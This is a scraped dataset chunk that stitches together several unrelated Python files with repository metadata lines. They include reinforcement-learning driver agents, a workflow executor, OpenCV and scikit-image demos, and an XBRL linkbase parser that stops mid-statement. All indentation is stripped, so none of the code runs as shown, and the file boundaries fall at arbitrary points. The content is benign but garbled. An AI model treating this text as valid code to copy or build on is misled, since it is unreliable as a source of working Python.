return [0]*3
class NoisyDriverAgent(Agent):
def __init__(self, env: Environment, prob_wrong: float, setting=1, noise_sw=.0, c_H=0., p_ignore_car=0.5):
"""
A noisy driver, which chooses the cell with the lowest noisy estimated cost.
Parameters
----------
env: Environment
prob_wrong : float
Probability of picking action at random
noise_sw : float
Standard deviation of the Gaussian noise beacuse of switching from Machine to Human
"""
super(NoisyDriverAgent, self).__init__()
self.p_ignore_car = p_ignore_car
self.prob_wrong = prob_wrong
self.noise_sw = noise_sw
self.type_costs = { **env.type_costs, 'wall':np.inf}
self.control_cost = c_H
self.trainable = False
self.setting = setting
self.actual = True
self.policy_approximation = defaultdict(dd_init)
def update_policy(self, state, action, grid_id):
"""Update policy approximation, needed for the off policy stage"""
# The human action in reality depends only on next row
human_obs = tuple(state)
self.policy_approximation[grid_id,human_obs][action]+=1
def get_policy_approximation(self, state, action, grid_id):
""" The approximated action policy distribution given the state """
human_obs = tuple(state)
total_state_visit = sum(self.policy_approximation[grid_id,human_obs])
p_human_a_s = self.policy_approximation[grid_id,human_obs][action] / total_state_visit
return p_human_a_s
def get_actual_policy(self, state, next_state):
greedy_cell = min(state[1:4], key=lambda x: self.type_costs[x])
next_cell = next_state[0]
is_greedy = next_cell == greedy_cell
n_cell = 2 if 'wall' in state[1:4] else 3
n_opt = sum(1 for cell in state[1:4] if cell == greedy_cell)
if self.setting == 1:
if is_greedy:
return (1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
else:
return self.prob_wrong/n_cell
elif self.setting != 1:
n_road = sum(1 for cell in state[1:4] if cell == 'road')
n_car = sum(1 for cell in state[1:4] if cell == 'car')
if is_greedy:
if next_cell == 'road':
mu_a_s = (1 - self.p_ignore_car)*(1 - self.prob_wrong)/n_road + self.p_ignore_car*(1 - self.prob_wrong)/(n_car + n_road) + self.prob_wrong/n_cell
return mu_a_s
elif next_cell == 'car':
return 1/n_car
else:
if 'car' in state[1:4]:
return (1 - self.p_ignore_car)*(1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
else:
return (1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
else:
if next_cell =='car':
return self.p_ignore_car * (1 - self.prob_wrong)/(n_road +n_car) + self.prob_wrong/n_cell
else:
return self.prob_wrong/n_cell
def get_policy(self, state, action, grid_id, next_state):
if self.actual:
return self.get_actual_policy(state, next_state)
else:
return self.get_policy_approximation(state, action, grid_id)
def take_action(self, curr_state, switch=False):
'''
current state in form of ['road', 'no-car','car','road','car', ...]
human considers only next row, not the others
'''
# if end of episode is reached
if len(curr_state) < 4:
return random.randint(0,2)
switch_noise = self.noise_sw if switch else 0.
p_choose = random.random()
p_ignore = random.random()
curr_state_for_human = copy(curr_state)
# ignore stone when switching
if self.setting >= 4:
for i, cell_type in enumerate(curr_state[1:4]):
if cell_type == 'car' and switch:
curr_state_for_human[i+1] = 'road'
if self.setting!=6:
for i, cell_type in enumerate(curr_state[1:4]):
if cell_type == 'car' and p_ignore < self.p_ignore_car:
curr_state_for_human[i+1] = 'road'
# noisy_next_cell_costs = [self.type_costs[nxt_cell_type] + random.gauss(0,estimation_noise) + random.gauss(0, switch_noise) if nxt_cell_type!='wall' else np.inf for nxt_cell_type, estimation_noise in zip(curr_state[2:5], estimation_noises)]
noisy_next_cell_costs = [self.type_costs[nxt_cell_type] for nxt_cell_type in curr_state_for_human[1:4]]
if p_choose < self.prob_wrong:
if curr_state[1] == 'wall':
action = random.choices(range(2), [1/2, 1/2])[0] + 1
elif curr_state[3] == 'wall':
action = random.choices(range(2), [1/2, 1/2])[0]
else:
action = random.choices(range(3), [1/3, 1/3, 1/3])[0]
return action
min_estimated_cost = np.min(noisy_next_cell_costs)
# ties are broken randomly
possible_actions = np.argwhere(noisy_next_cell_costs == min_estimated_cost).flatten()
n_possible_actions = possible_actions.size
action = random.choices(possible_actions, [1/n_possible_actions]*n_possible_actions)[0]
return action
class RandomDriverAgent(Agent):
def __init__(self):
"""A random driver """
super(RandomDriverAgent, self).__init__()
self.trainable = False
self.control_cost = 0.0
self.policy_approximation = defaultdict(dd_init)
def update_policy(self, state, action):
"""Update policy approximation, needed for the off policy stage"""
# The human action in reality depends only on next row
human_obs = tuple(state )
self.policy_approximation[human_obs][action]+=1
def get_policy_approximation(self, state, action):
""" The approximated action policy distribution given the state """
human_obs = tuple(state )
total_state_visit = sum(self.policy_approximation[human_obs])
p_human_a_s = self.policy_approximation[human_obs][action] / total_state_visit
return p_human_a_s
def take_action(self, curr_state, switch=False):
action = random.choices(range(3), [1/3, 1/3, 1/3])[0]
return action
class OptimalAgent():
def __init__(self, env: GridWorld, control_cost):
self.env = env
self.control_cost = control_cost
self.p = np.zeros(shape=(self.env.width,self.env.height, 3, self.env.width,self.env.height))
for y in range(self.env.height):
for x in range(self.env.width):
for a in range(3):
nxt_x,nxt_y = self.env.next_coords(x,y,a)
self.p[x,y,a,nxt_x,nxt_y] = 1.
self.policy = self.val_itr()
def take_action(self, time, coords):
x,y = coords
return random.choices(range(3), self.policy[time][x][y])[0]
def eval(self, n_try=1, plt_path=None):
total_cost = []
for i in range(n_try):
self.env.reset()
traj_cost = 0
time = 0
while True:
cur_coords = self.env.current_coord
action = self.take_action(time, cur_coords)
_, cost, finished = self.env.step(action)
if finished:
break
traj_cost+=cost + self.control_cost
if plt_path is not None:
plt_path.add_line(cur_coords, self.env.current_coord, 'red')
total_cost.append(traj_cost)
return np.mean(total_cost)
def val_itr(self):
ep_l = self.env.height
n_ac = 3
# q_val[time][state][action]
q_val = np.zeros(shape=(ep_l, self.env.width,self.env.height, n_ac))
# q_min[time][state]
q_min = np.zeros(shape=(ep_l + 1, self.env.width,self.env.height))
# policy[time][state][action]
policy = np.zeros(shape=(ep_l, self.env.width,self.env.height, n_ac))
for i in range(ep_l):
t = ep_l - i - 1
for y in range(self.env.height):
for x in range(self.env.width):
for a in range(n_ac):
nxt_x,nxt_y = self.env.next_coords(x,y,a)
q_val[t][x][y][a] = self.env.type_costs[self.env.cell_types[nxt_x,nxt_y]] + np.sum(self.p[x,y,a]* q_min[t + 1])
best_actions = np.where(q_val[t][x][y] == np.min(q_val[t][x][y]))[0]
policy[t][x,y][best_actions] = 1 / len(best_actions)
q_min[t][x][y] = np.min(q_val[t][x][y])
return policy | ElenStr/human-machine-switching | agent/agents.py | agents.py | py | 14,470 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "networks.networks.ActorNet",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "torch.nn.utils.clip_grad_norm_",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": ... |
11424826236 | import logging
from edera.exceptions import ExcusableError
from edera.exceptions import ExcusableWorkflowExecutionError
from edera.exceptions import WorkflowExecutionError
from edera.queue import Queue
from edera.routine import deferrable
from edera.routine import routine
from edera.workflow.executor import WorkflowExecutor
class BasicWorkflowExecutor(WorkflowExecutor):
"""
A basic workflow executor.
Expects tasks to be ranked in advance.
Runs tasks in the current thread one by one, handles exceptions, and performs logging.
This executor is interruptible.
See also:
$TaskRanker
"""
@routine
def execute(self, workflow):
queue = Queue(workflow)
stopped_tasks = []
failed_tasks = []
while queue:
task = queue.pick()
if task.phony:
queue.accept()
continue
try:
logging.getLogger(__name__).debug("Picked task %r", task)
if task.target is not None:
completed = yield deferrable(task.target.check).defer()
if completed:
queue.accept()
continue
logging.getLogger(__name__).info("Running task %r", task)
yield deferrable(task.execute).defer()
except ExcusableError as error:
logging.getLogger(__name__).info("Task %r stopped: %s", task, error)
stopped_tasks.append(task)
queue.discard()
except Exception:
logging.getLogger(__name__).exception("Task %r failed:", task)
failed_tasks.append(task)
queue.discard()
else:
logging.getLogger(__name__).info("Task %r completed", task)
queue.accept()
if failed_tasks:
raise WorkflowExecutionError(failed_tasks)
if stopped_tasks:
raise ExcusableWorkflowExecutionError(stopped_tasks)
| thoughteer/edera | edera/workflow/executors/basic.py | basic.py | py | 2,027 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "edera.workflow.executor.WorkflowExecutor",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "edera.queue.Queue",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 36,
"usage_type": "call"
},
{
"api_... |
3496632276 | # importing pycairo
import cairo
# creating a SVG surface
# here geek95 is file name & 700, 700 is dimension
with cairo.SVGSurface("geek95.svg", 700, 700) as surface:
# creating a cairo context object for SVG surface
# using Context method
context = cairo.Context(surface)
# move the context to x,y position
context.move_to(50, 200)
# Drawing Curve
context.curve_to(150, 75, 225, 50, 350, 150)
# setting color of the context
context.set_source_rgb(1, 0, 0)
# setting width of the context
context.set_line_width(4)
# stroke out the color and width property
context.stroke()
# printing message when file is saved
print("File Saved")
# ---------------------------------------------------------------------------------------
import cv2
import numpy as np
def gammaCorrection(src, gamma):
invGamma = 1 / gamma
table = [((i / 255) ** invGamma) * 255 for i in range(256)]
table = np.array(table, np.uint8)
return cv2.LUT(src, table)
img = cv2.imread('image.jpg')
gammaImg = gammaCorrection(img, 2.2)
cv2.imshow('Original image', img)
cv2.imshow('Gamma corrected image', gammaImg)
cv2.waitKey(0)
cv2.destroyAllWindows()
# -----------------------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
from skimage import color, data, restoration
rng = np.random.default_rng()
astro = color.rgb2gray(data.astronaut())
from scipy.signal import convolve2d as conv2
psf = np.ones((5, 5)) / 25
astro = conv2(astro, psf, 'same')
astro += 0.1 * astro.std() * rng.standard_normal(astro.shape)
deconvolved, _ = restoration.unsupervised_wiener(astro, psf)
fig, ax = plt.subplots(nrows=1, ncols=2, figsize=(8, 5),
sharex=True, sharey=True)
plt.gray()
ax[0].imshow(astro, vmin=deconvolved.min(), vmax=deconvolved.max())
ax[0].axis('off')
ax[0].set_title('Data')
ax[1].imshow(deconvolved)
ax[1].axis('off')
ax[1].set_title('Self tuned restoration')
fig.tight_layout()
plt.show()
# ----------------------------------------------------------------------------------
import cv2
import numpy as np
# Read source image.
im_src = cv2.imread('image1.png')
# Four corners of the book in source image
pts_src = np.array([[141, 131], [480, 159], [493, 630], [64, 601]])
# Read destination image.
im_dst = cv2.imread('image.jpg')
# Four corners of the book in destination image.
pts_dst = np.array([[318, 256], [534, 372], [316, 670], [73, 473]])
# Calculate Homography
h, status = cv2.findHomography(pts_src, pts_dst)
# Warp source image to destination based on homography
im_out = cv2.warpPerspective(im_src, h, (im_dst.shape[1], im_dst.shape[0]))
# Display images
cv2.imshow("Source Image", im_src)
cv2.imshow("Destination Image", im_dst)
cv2.imshow("Warped Source Image", im_out)
cv2.waitKey(0)
#---------------------------------------------------------------------------
import cv2
import numpy as np
image = cv2.imread('image.jpg')
#Apply identity kernel
kernel1 = np.array([[0, 0, 0],
[0, 1, 0],
[0, 0, 0]])
# filter2D() function can be used to apply kernel to an image.
# Where ddepth is the desired depth of final image. ddepth is -1 if...
# ... depth is same as original or source image.
identity = cv2.filter2D(src=image, ddepth=-1, kernel=kernel1)
# We should get the same image
cv2.imshow('Original', image)
cv2.imshow('Identity', identity)
cv2.waitKey()
cv2.imwrite('identity.jpg', identity)
cv2.destroyAllWindows()
# ------------------------------------------------------------
import cv2
import numpy as np
image = cv2.imread('image.jpg')
#Apply blurring kernel
kernel2 = np.ones((5, 5), np.float32) / 25
img = cv2.filter2D(src=image, ddepth=-1, kernel=kernel2)
cv2.imshow('Original', image)
cv2.imshow('Kernel Blur', img)
cv2.waitKey()
cv2.imwrite('blur_kernel.jpg', img)
cv2.destroyAllWindows()
| Malgetany/ch2-part2 | main.py | main.py | py | 3,947 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cairo.SVGSurface",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "cairo.Context",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_numb... |
17523274197 | #!/usr/bin/env python
"""
author: Jun Ding
date: 2020-07-06
function: plot the expression of input gene
copy and modification of this code is allowed for academic purposes.
Please don NOT remove this author statement under any condition.
"""
import sys,os,pdb,argparse
import anndata
import scanpy as sc
def plotGene(exFn,gene):
prRes=anndata.read_h5ad(exFn)
if gene in prRes.var.index:
sc.pl.umap(prRes,color=[gene])
else:
print("Error! please check your input gene ID, it must be the same as in your expression file")
print("Also, the missing gene could be caused by the dispersion based gene filtering by the prerun program")
def main():
parser=argparse.ArgumentParser(description="scdiff2 plotGene")
parser.add_argument('-i','--input',required=True,help='input h5ad prerun result')
parser.add_argument('-g','--gene',required=True, help='gene name you want to explore, must be the same ID as in your original input expression file')
args = parser.parse_args()
exFn=args.input
gene=args.gene
plotGene(exFn,gene)
if __name__=="__main__":
main()
| phoenixding/scdiff2 | utils/plotGene.py | plotGene.py | py | 1,080 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "anndata.read_h5ad",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "scanpy.pl.umap",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "scanpy.pl",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentPars... |
4500680225 | import abc
import os
import xml.etree.ElementTree as ET
from abc import ABC
from enum import Enum
from typing import List
from xbrl import XbrlParseException, LinkbaseNotFoundException
from xbrl.cache import HttpCache
from xbrl.helper.uri_helper import resolve_uri
LINK_NS: str = "{http://www.xbrl.org/2003/linkbase}"
XLINK_NS: str = "{http://www.w3.org/1999/xlink}"
XBRLDT_NS: str = "{http://xbrl.org/2005/xbrldt}"
XML_NS: str = "{http://www.w3.org/XML/1998/namespace}"
class LinkbaseType(Enum):
""" Enum of linkbase types, that this parser can parse """
DEFINITION = 0x001
CALCULATION = 0x002
PRESENTATION = 0x003
LABEL = 0x004
@staticmethod
def get_type_from_role(role: str) -> int or None:
"""
Takes a xlink:role (i.e http://www.xbrl.org/2003/role/definitionLinkbaseRef) and returns the corresponding
LinkbaseType
@param role:
@return: LinkbaseType or None if the role is unknown
"""
return {
'http://www.xbrl.org/2003/role/definitionLinkbaseRef': LinkbaseType.DEFINITION,
'http://www.xbrl.org/2003/role/calculationLinkbaseRef': LinkbaseType.CALCULATION,
'http://www.xbrl.org/2003/role/presentationLinkbaseRef': LinkbaseType.PRESENTATION,
'http://www.xbrl.org/2003/role/labelLinkbaseRef': LinkbaseType.LABEL,
}.get(role, None)
@staticmethod
def guess_linkbase_role(href: str) -> int or None:
"""
Guesses the linkbase role based on the name of the linkbase
@param href:
@return:
"""
return LinkbaseType.DEFINITION if '_def' in href \
else LinkbaseType.CALCULATION if '_cal' in href \
else LinkbaseType.PRESENTATION if '_pre' in href \
else LinkbaseType.LABEL if '_lab' in href \
else None
class AbstractArcElement(ABC):
"""
Represents an abstract Arc
An Arc links two Locators together and assigns a relation ship between those two items.
Arcs are used in all linkbases (definition, calculation, presentation and label)
From the Xbrl Specification 2.0:
Standard Arc Element:
An element derived from xl:arc that is defined in this specification, Specifically,
one of: link:presentationArc, link:calculationArc, link:labelArc, link:referenceArc, or link:definitionArc.
i.e:
<link:definitionArc order="30"
xlink:arcrole="http://xbrl.org/int/dim/arcrole/domain-member"
xlink:from="loc_AssetsAbstract"
xlink:to="loc_CashAndCashEquivalentsAtCarryingValue" xlink:type="arc"/>
This arc describes the relationship between Assets and Cash and Cash Equivalents. Cash is a sub-domain from Assets.
"""
def __init__(self, from_locator, arcrole: str, order: int) -> None:
"""
@param from_locator: Locator Object from that the arc is pointing from
to_locator: is missing here, because not all arc's point to another locator. A label arc for example points
to multiple link:label's
@type from_locator: Locator
@param arcrole: Role of the arc
@param order: Order attribute of the arc. Only makes sense in combination with the arc role.
i.e arcrole parent-child together with the order attribute defines a hierarchical relationship between elements
(XBRL for Interactive Data, 2009, p.59)
"""
self.from_locator = from_locator
self.arcrole: str = arcrole
self.order: int = order
@abc.abstractmethod
def to_dict(self):
""" Returns a dictionary representation of the arc """
pass
class RelationArc(AbstractArcElement, ABC):
"""
A Relation arc is an abstract implementation of an AbstractArc Element that has the to_locator attribute
"""
def __init__(self, from_locator, to_locator, arcrole: str, order: int) -> None:
super().__init__(from_locator, arcrole, order)
self.to_locator: Locator = to_locator
class DefinitionArc(RelationArc):
""" Represents a definition arc (link:definitionArc) """
def __init__(self, from_locator, to_locator, arcrole: str, order: int, closed: bool = None,
context_element: str = None) -> None:
"""
@type from_locator: Locator
@type to_locator: Locator
@param arcrole: Can be one of the following: (XBRL for Interactive Data, 2009, p.140)
- http://xbrl.org/int/dim/arcrole/all:
connects a measure to a hypercube implying use of dimensions attached to this hypercube and their
specified breakdowns
Elements:
- closed: boolean,
- contextElement: (segment/scenario),
- targetRole: anyURI
- http://xbrl.org/int/dim/arcrole/notAll
connects a measure to a hypercube prohibiting use of dimensions attached to this hypercube and their
specified breakdowns
Elements:
- closed: boolean,
- contextElement: (segment/scenario),
- targetRole: anyURI
- http://xbrl.org/int/dim/arcrole/hypercube-dimension
connects a hypercube and a dimension item
Elements:
- targetRole: anyURI
- http://xbrl.org/int/dim/arcrole/dimension-domain
connects a dimension item to its top level members in every variation of a breakdown
Elements:
- usage: boolean,
- targetRole: anyURI
- http://xbrl.org/int/dim/arcrole/domain-member
defines hierarchical relations for measures and domain members; in case of measures implies inheritance
of dimensional characteristics from upper-level concepts
Elements:
- usage:boolean,
- targetRole: anyURI
- http://xbrl.org/int/dim/arcrole/dimension-default
links dimension item to its default member (usually total of the full breakdown)
Elements:
None
"""
super().__init__(from_locator, to_locator, arcrole, order)
self.closed: bool or None = closed
self.context_element: bool or None = context_element
def __str__(self) -> str:
return "Linking to {} as {}".format(str(self.to_locator.name), self.arcrole.split('/')[-1])
def to_dict(self) -> dict:
""" Returns a dictionary representation of the arc """
return {"arcrole": self.arcrole, "order": self.order, "closed": self.closed,
"contextElement": self.context_element,
"locator": self.to_locator.to_dict()}
class CalculationArc(RelationArc):
""" Represents a calculation arc (link:calculationArc) """
def __init__(self, from_locator, to_locator, order: int, weight: float) -> None:
"""
@type from_locator: Locator
@type to_locator: Locator
@param weight: Defines the sign and multiplication factor for two connected concepts
(XBRL for Interactive Data, 2009, p.61)
"""
# A Calculation arc only has the summation-item arc role
super().__init__(from_locator, to_locator, "http://www.xbrl.org/2003/arcrole/summation-item", order)
self.weight: float = weight
def to_dict(self):
""" Returns a dictionary representation of the arc """
return {"arcrole": self.arcrole, "order": self.order, "weight": self.weight,
"locator": self.to_locator.to_dict()}
def __str__(self) -> str:
return "{} {}".format(self.arcrole.split('/')[-1], self.to_locator.concept_id)
class PresentationArc(RelationArc):
""" Represents a presentation arc (link:presentationArc) """
def __init__(self, from_locator, to_locator, order: int, priority: int, preferred_label: str = None) -> None:
"""
@type from_locator: Locator
@type to_locator: Locator
@param preferred_label: indicates the most appropriate kind of label to use when presenting the arc's child Concept
(XBRL Specification 2.1, 5.2.4.2.1)
"""
# A Presentation arc only has the parent-child arc role
super().__init__(from_locator, to_locator, "http://www.xbrl.org/2003/arcrole/parent-child", order)
self.priority = priority
self.preferred_label: str = preferred_label
def to_dict(self):
""" Returns a dictionary representation of the arc """
return {"arcrole": self.arcrole, "order": self.order,
"preferredLabel": self.preferred_label, "locator": self.to_locator.to_dict()}
def __str__(self) -> str:
return "{} {}".format(self.arcrole.split('/')[-1], self.to_locator.concept_id)
class Label:
"""
Class representing a label (link:label)
This class is only used by LabelArcs in label Linkbases
Example for label in label linkbase:
<link:label id="lab_Assets_label_en-US" xlink:label="lab_Assets" xlink:role="http://www.xbrl.org/2003/role/label"
xlink:type="resource" xml:lang="en-US">Assets</link:label>
"""
def __init__(self, label: str, label_type: str, language: str, text: str) -> None:
"""
@param label: the xlink:label of the label (locators will be referencing the label over the xlink:label attribute)
@param label_type: the role of the label, possible values (XBRL for Interactive Data, 2009, p.61):
- http://www.xbrl.org/2003/role/label:
Standard label for a concept
- http://www.xbrl.org/2003/role/terseLabel:
Short label for a concept, often omitting text that should be inferable when the concept is reported
in the context of other related concepts
- http://www.xbrl.org/2003/role/verboseLabel:
Extended label for a concept, making sure not to omit text that is required to enable the label to be
understood on a standalone basis
- http://www.xbrl.org/2003/role/totalLabel:
The label for a concept for use in presenting values associated with the concept when it is being
reported as the total of a set of other values
- http://www.xbrl.org/2003/role/periodStartLabel & http://www.xbrl.org/2003/role/periodEndLabel:
The label for a concept with periodType="instant" for use in presenting values associated with the
concept when it is being reported as a start (end) of period value
- http://www.xbrl.org/2003/role/documentation:
Documentation of a concept, providing an explanation of its meaning and its appropriate usage and any
other documentation deemed necessary
"""
# the label of the link:label element (see Locator label) i.e: lab_Assets
self.label: str = label
self.language = language
# the label itself i.e: "Defined Benefit Plan Disclosure [Line Items]"
self.text: str = text.strip() if text is not None else text
# the role of the label i.e: http://www.xbrl.org/2003/role/terseLabel
self.label_type: str = label_type
def __str__(self) -> str:
return self.text
class LabelArc(AbstractArcElement):
"""
Represents a label arc (link:labelArc)
The xml representation of a label arc also has a xlink:to attribute, like the Relational Arcs.
However in contrast to the xlink:to attribute of relational arcs which is pointing to another locator (1:1), the xlink:to
attribute of a label arc points to multiple label elements
"""
def __init__(self, from_locator, order: int, labels: List[Label]) -> None:
"""
@type from_locator: Locator
@param labels: Array of label objects, the arc is pointing to
@type labels: Label[]
"""
# A Label Arc only has the concept-label arc role
super().__init__(from_locator, "http://www.xbrl.org/2003/arcrole/concept-label", order)
self.labels = labels
def __str__(self) -> str:
return "LabelArc with {} labels".format(len(self.labels))
def to_dict(self) -> dict:
"""
Returns a dictionary representation of the label arc.
"""
label_obj = {}
# dynamically add all available labels
for label in self.labels:
label_obj[label.label_type] = label.text
return label_obj
class Locator:
"""
Represents a Locator. The Locator points from the Linkbase back to the Concept, that is defined in the schema file
i.e: <link:loc xlink:href="../elts/us-gaap-2019-01-31.xsd#us-gaap_Goodwill" xlink:label="loc_Goodwill"
xlink:type="locator"/>
"""
def __init__(self, href: str, name: str):
"""
@param href: The link, the locator is pointing to. IN ABSOLUTE FORMAT (starting with http...)
@param name: The name (xlink:label) from the locator
"""
# the link of the concept the locator is pointing to (i.e: ../elts/us-gaap-2019-01-31.xsd#us-gaap_Goodwill)
self.href: str = href
# the label of the Locator (i.e: loc_Goodwill)
self.name: str = name
# the id of the concept (i.e: us-gaap_Goodwill)
self.concept_id: str = href.split('#')[1]
# This array stores the locators that that are connected with this locator via a label arc, there
# the current locator was in the to attribute. This array is only used for finding the root locators (the locators
# that have no parents)
self.parents: List[Locator] = []
# This array stores all the labelArcs that reference this locator in the "from" attribute
self.children: List[AbstractArcElement] = []
def __str__(self) -> str:
return "{} with {} children".format(self.name, len(self.children))
def to_dict(self) -> dict:
"""
Returns a dictionary representation of the Locator.
This method will ignore the parents array and will take the children for building the
recursive dictionary hierarchy
@return:
"""
return {"name": self.name, "href": self.href, "concept_id": self.concept_id,
"children": [arc_element.to_dict() for arc_element in self.children]}
def to_simple_dict(self) -> dict:
"""
Does the same as to_dict() but ignores the ArcElements.
So it basically returns the hierarchy, without the information in which type of relationship
parent and children are
@return:
"""
return {"concept_id": self.concept_id,
"children": [arc_element.to_locator.to_simple_dict() for arc_element in self.children]}
class ExtendedLink:
"""
Generic class for definitionLink, labelLink, referenceLink and calculationLink elements
From the Xbrl Specification 2.0:
Standard Extended Link Element:
An element derived from xl:link that is defined in this specification. Specifically, one of:
link:presentationLink, link:calculationLink, link:labelLink, link:referenceLink, or link:definitionLink.
"""
def __init__(self, role: str, elr_id: str or None, root_locators: List[Locator]) -> None:
"""
@param role: role of the extended link element
@param elr_id: the link to the extended Link role (as defined in the schema file)
i.e aapl-20180929.xsd#ConsolidatedStatementsOfComprehensiveIncome
Is none for label linkbases!
@param root_locators: Label array of all root locators (all locators that have no parents)
"""
self.role: str = role
self.elr_id: str or None = elr_id
self.root_locators: List[Locator] = root_locators
def to_dict(self) -> dict:
"""
Returns a dictionary representation of the ExtendedLinkElement
@return:
"""
return {"role": self.role, "elr_id": self.elr_id,
"root_locators": [loc.to_dict() for loc in self.root_locators]}
def to_simple_dict(self) -> dict:
"""
Does the same as to_dict() but ignores the ArcElements.
So it basically returns the hierarchy, without the information in which type of relationship
parent and children are
@return:
"""
return {"role": self.role, "children": [loc.to_simple_dict() for loc in self.root_locators]}
def __str__(self) -> str:
return self.elr_id
class Linkbase:
"""
Represents a complete Linkbase (non-generic).
"""
def __init__(self, extended_links: List[ExtendedLink], linkbase_type: LinkbaseType, linkbase_uri: None or str = None) -> None:
"""
:param extended_links: All standard extended links that are defined in the linkbase
:type extended_links: [ExtendedDefinitionLink] or [ExtendedCalculationLink] or [ExtendedPresentationLink] or [ExtendedLabelArc]
:param linkbase_type: Type of the linkbase
:param linkbase_uri: Either the path or the url to the linkbase (depends from where the parser loaded it for parsing)
"""
self.extended_links: List[ExtendedLink] = extended_links
self.type = linkbase_type
self.linkbase_uri = linkbase_uri
def to_dict(self) -> dict:
"""
Converts the Linkbase object with in a dictionary representing the Hierarchy of the locators
"""
return {"standardExtendedLinkElements": [el.to_dict() for el in self.extended_links]}
def to_simple_dict(self) -> dict:
"""
Does the same as to_dict() but ignores the ArcElements.
So it basically returns the hierarchy, without the information in which type of relationship
parent and children are
"""
return {"standardExtendedLinkElements": [el.to_simple_dict() for el in self.extended_links]}
def parse_linkbase_url(linkbase_url: str, linkbase_type: LinkbaseType, cache: HttpCache) -> Linkbase:
"""
Parses a linkbase given given a url
:param linkbase_url: full link to the linkbase
:param linkbase_type: type of the linkbase (calculation-, label-, presentation-, ...)
:param cache: :class:`xbrl.cache.HttpCache` instance
:return: parsed :class:`xbrl.linkbase.Linkbase` object
"""
if not linkbase_url.startswith('http'): raise XbrlParseException(
'This function only parses remotely saved linkbases. Please use parse_linkbase to parse local linkbases')
linkbase_path: str = cache.cache_file(linkbase_url)
return parse_linkbase(linkbase_path, linkbase_type, linkbase_url)
def parse_linkbase(linkbase_path: str, linkbase_type: LinkbaseType, linkbase_url: str or None = None) -> Linkbase:
"""
Parses a linkbase and returns a Linkbase object containing all
locators, arcs and links of the linkbase in a hierarchical order (a Tree)
A Linkbase usually does not import any additional files.
Thus no cache instance is needed
:param linkbase_path: path to the linkbase
:param linkbase_type: Type of the linkbase
:param linkbase_url: if the locator of the linkbase contain relative references to concepts
(i.e.: './../schema.xsd#Assets') the url has to be set so that the parser can connect
the locator with concept from the taxonomy
:return: parsed :class:`xbrl.linkbase.Linkbase` object
"""
if linkbase_path.startswith('http'): raise XbrlParseException(
'This function only parses locally saved linkbases. Please use parse_linkbase_url to parse remote linkbases')
if not os.path.exists(linkbase_path):
raise LinkbaseNotFoundException(f"Could not find linkbase at {linkbase_path}")
root: ET.Element = ET.parse(linkbase_path).getroot()
# store the role refs in a dictionary, with the role uri as key.
# Role Refs are xlink's that connect the extended Links to the ELR defined in the schema
role_refs: dict = {}
for role_ref in root.findall(LINK_NS + 'roleRef'):
role_refs[role_ref.attrib['roleURI']] = role_ref.attrib[XLINK_NS + 'href']
# Loop over all definition/calculation/presentation/label links.
# Each extended link contains the locators and the definition arc's
extended_links: List[ExtendedLink] = []
# figure out if we want to search for definitionLink, calculationLink, presentationLink or labelLink
# figure out for what type of arcs we are searching; definitionArc, calculationArc, presentationArc or labelArc
extended_link_tag: str
arc_type: str
if linkbase_type == LinkbaseType.DEFINITION:
extended_link_tag = "definitionLink"
arc_type = "definitionArc"
elif linkbase_type == LinkbaseType.CALCULATION:
extended_link_tag = "calculationLink"
arc_type = "calculationArc"
elif linkbase_type == LinkbaseType.PRESENTATION:
extended_link_tag = "presentationLink"
arc_type = "presentationArc"
else:
extended_link_tag = "labelLink"
arc_type = "labelArc"
# loop over all extended links. Extended links can be: link:definitionLink, link:calculationLink e.t.c
# Note that label linkbases only have one extended link
for extended_link in root.findall(LINK_NS + extended_link_tag):
extended_link_role: str = extended_link.attrib[XLINK_NS + 'role']
# find all locators (link:loc) and arcs (i.e link:definitionArc or link:calculationArc)
locators = extended_link.findall(LINK_NS + 'loc')
arc_elements = extended_link.findall(LINK_NS + arc_type)
# store the locators in a dictionary. The label attribute is the key. This way we can access them in O(1)
locator_map = {}
for loc in locators:
loc_label: str = loc.attrib[XLINK_NS + 'label']
# check if the locator href is absolute
locator_href = loc.attrib[XLINK_NS + 'href']
if not locator_href.startswith('http'):
# resolve the path
# todo, try to get the URL here, instead of the path!!!
locator_href = resolve_uri(linkbase_url if linkbase_url else linkbase_path, locator_href)
locator_map[loc_label] = Locator(locator_href, loc_label)
# Performance: extract the labels in advance. The label name (xlink:label) is the key and the value is
# an array of all labels that have this name. This can be multiple labels (label, terseLabel, documentation...)
label_map = {}
if linkbase_type == LinkbaseType.LABEL:
for label_element in extended_link.findall(LINK_NS + 'label'):
label_name: str = label_element.attrib[XLINK_NS + 'label']
label_role: str = label_element.attrib[XLINK_NS + 'role']
label_lang: str = label_element.attrib[XML_NS + 'lang']
label_obj = Label(label_name, label_role, label_lang, label_element.text)
if label_name in label_map:
label_map[label_name].append(label_obj)
else:
label_map[label_name] = [label_obj]
for arc_element in arc_elements:
# if the use of the element referenced by the arc is prohibited, just ignore it
if 'use' in arc_element.attrib and arc_element.attrib['use'] == 'prohibited': continue
# extract the attributes if the arc. The arc always connects two locators through the from and to attributes
# additionally it defines the relationship between these two locators (arcrole)
arc_from: str = arc_element.attrib[XLINK_NS + 'from']
arc_to: str = arc_element.attrib[XLINK_NS + 'to']
arc_role: str = arc_element.attrib[XLINK_NS + 'arcrole']
arc_order: int = arc_element.attrib['order'] if 'order' in arc_element.attrib else None
# the following attributes are linkbase specific, so we have to check if they exist!
# Needed for (sometimes) definitionArc
arc_closed: bool = bool(arc_element.attrib[XBRLDT_NS + "closed"]) \
